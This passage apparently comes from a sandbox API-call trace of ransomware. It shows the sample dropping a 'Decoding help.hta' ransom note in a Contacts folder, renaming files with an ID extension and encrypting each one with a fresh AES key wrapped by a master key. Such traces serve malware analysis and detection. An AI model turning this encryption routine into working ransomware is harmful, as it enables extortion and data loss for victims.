lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0040.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0040.276] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" [0040.276] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decoding help.hta")) returned 0xffffffff [0040.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0041.153] WriteFile (in: hFile=0x318, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xce0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.154] CloseHandle (hObject=0x318) returned 1 [0041.154] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.155] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Aclviho ASldjfl.contact") returned 1 [0041.155] lstrlenW (lpString="Aclviho ASldjfl.contact") returned 23 [0041.155] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0041.155] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0041.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Aclviho ASldjfl.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0041.155] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0041.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.[ID]g9uZrLhJaygpwRm1[ID]" [0041.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0041.157] CreateFileMappingA (hFile=0x23c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0041.157] CryptAcquireContextA (in: phProv=0xce0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0fcec*=0x34490b0) returned 1 [0043.570] CryptGenKey (in: hProv=0x34490b0, Algid=0x6610, dwFlags=0x1, phKey=0xce0fce8 | out: phKey=0xce0fce8*=0x5d7f50) returned 1 [0043.570] CryptExportKey (in: hKey=0x5d7f50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xce0fbe4, pdwDataLen=0xce0fce4 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fce4*=0x2c) returned 1 [0043.570] MapViewOfFile (hFileMappingObject=0x134, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x4410000 [0043.618] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x100) returned 1 [0043.618] CryptEncrypt (in: hKey=0x5d7f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0xce0fce4*=0x480, dwBufLen=0x480 | out: pbData=0x4410000*, pdwDataLen=0xce0fce4*=0x480) returned 1 [0043.619] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.620] CloseHandle (hObject=0x134) returned 1 [0043.620] CryptDestroyKey (hKey=0x5d7f50) returned 1 [0043.620] CryptReleaseContext (hProv=0x34490b0, dwFlags=0x0) returned 1 [0043.620] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.620] WriteFile (in: hFile=0x23c, lpBuffer=0xce0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xce0fbe4*, lpNumberOfBytesWritten=0xce0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.621] WriteFile (in: hFile=0x23c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xce0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.621] CloseHandle (hObject=0x23c) returned 1 [0043.733] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.734] FindNextFileW (in: hFindFile=0x5a5970, lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0043.734] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0043.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0043.734] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" [0043.734] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decoding help.hta")) returned 0x1 [0043.734] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Administrator.contact") returned 1 [0043.734] lstrlenW (lpString="Administrator.contact") returned 21 [0043.734] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0043.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0043.734] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Administrator.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0043.734] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0043.735] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]" [0043.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0043.735] CreateFileMappingA (hFile=0x3ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x314 [0043.735] CryptAcquireContextA (in: phProv=0xce0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0fcec*=0x3449138) returned 1 [0043.736] CryptGenKey (in: hProv=0x3449138, Algid=0x6610, dwFlags=0x1, phKey=0xce0fce8 | out: phKey=0xce0fce8*=0x5d8410) returned 1 [0043.736] CryptExportKey (in: hKey=0x5d8410, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xce0fbe4, pdwDataLen=0xce0fce4 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fce4*=0x2c) returned 1 [0043.736] MapViewOfFile (hFileMappingObject=0x314, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b00) returned 0x4520000 [0043.791] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x100) returned 1 [0043.791] CryptEncrypt (in: hKey=0x5d8410, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4520000, pdwDataLen=0xce0fce4*=0x10b00, dwBufLen=0x10b00 | out: pbData=0x4520000*, pdwDataLen=0xce0fce4*=0x10b00) returned 1 [0044.088] UnmapViewOfFile (lpBaseAddress=0x4520000) returned 1 [0044.091] CloseHandle (hObject=0x314) returned 1 [0044.091] CryptDestroyKey (hKey=0x5d8410) returned 1 [0044.091] CryptReleaseContext (hProv=0x3449138, dwFlags=0x0) returned 1 [0044.091] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.091] WriteFile (in: hFile=0x3ac, lpBuffer=0xce0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xce0fbe4*, lpNumberOfBytesWritten=0xce0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.092] WriteFile (in: hFile=0x3ac, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xce0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.092] CloseHandle (hObject=0x3ac) returned 1 [0044.093] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.094] FindNextFileW (in: hFindFile=0x5a5970, lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0046.789] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0046.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0046.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" [0046.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decoding help.hta")) returned 0x1 [0046.789] lstrcmpiW (lpString1="Decoding help.hta", lpString2="asdlfk poopvy.contact") returned 1 [0046.789] lstrlenW (lpString="asdlfk poopvy.contact") returned 21 [0046.789] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0046.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0046.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="asdlfk poopvy.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0046.789] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" [0046.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.[ID]g9uZrLhJaygpwRm1[ID]" [0046.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0046.790] CreateFileMappingA (hFile=0x4c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4b4 [0046.790] CryptAcquireContextA (in: phProv=0xce0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0fcec*=0x344a128) returned 1 [0046.791] CryptGenKey (in: hProv=0x344a128, Algid=0x6610, dwFlags=0x1, phKey=0xce0fce8 | out: phKey=0xce0fce8*=0x5a5870) returned 1 [0046.791] CryptExportKey (in: hKey=0x5a5870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xce0fbe4, pdwDataLen=0xce0fce4 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fce4*=0x2c) returned 1 [0046.791] MapViewOfFile (hFileMappingObject=0x4b4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x25b0000 [0046.910] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x100) returned 1 [0046.911] CryptEncrypt (in: hKey=0x5a5870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x25b0000*, pdwDataLen=0xce0fce4*=0x480, dwBufLen=0x480 | out: pbData=0x25b0000*, pdwDataLen=0xce0fce4*=0x480) returned 1 [0046.911] UnmapViewOfFile (lpBaseAddress=0x25b0000) returned 1 [0046.912] CloseHandle (hObject=0x4b4) returned 1 [0046.912] CryptDestroyKey (hKey=0x5a5870) returned 1 [0046.912] CryptReleaseContext (hProv=0x344a128, dwFlags=0x0) returned 1 [0046.912] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.912] WriteFile (in: hFile=0x4c0, lpBuffer=0xce0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0xce0fbe4*, lpNumberOfBytesWritten=0xce0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.913] WriteFile (in: hFile=0x4c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xce0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xce0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.913] CloseHandle (hObject=0x4c0) returned 1 [0046.914] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.914] FindNextFileW (in: hFindFile=0x5a5970, lpFindFileData=0xce0fd30 | out: lpFindFileData=0xce0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0046.914] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0046.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0046.914] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" [0046.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\decoding help.hta")) returned 0x1 [0046.915] lstrcmpiW (lpString1="Decoding help.hta", lpString2="chucu jadnvk.contact") returned 1 [0046.915] lstrlenW (lpString="chucu jadnvk.contact") returned 20 [0046.915] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0046.915] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned 46 [0046.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="chucu jadnvk.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0046.915] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0046.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.[ID]g9uZrLhJaygpwRm1[ID]" [0046.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0046.995] CreateFileMappingA (hFile=0x3e8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x698 [0046.995] CryptAcquireContextA (in: phProv=0xce0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0fcec*=0x344a128) returned 1 [0046.996] CryptGenKey (in: hProv=0x344a128, Algid=0x6610, dwFlags=0x1, phKey=0xce0fce8 | out: phKey=0xce0fce8*=0x5d8690) returned 1 [0046.996] CryptExportKey (in: hKey=0x5d8690, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xce0fbe4, pdwDataLen=0xce0fce4 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fce4*=0x2c) returned 1 [0046.996] MapViewOfFile (hFileMappingObject=0x698, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x25b0000 [0047.027] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xce0fbe4*, pdwDataLen=0xce0fcf8*=0x100) returned 1 [0047.027] CryptEncrypt (in: hKey=0x5d8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x25b0000*, pdwDataLen=0xce0fce4*=0x480, dwBufLen=0x480 | out: 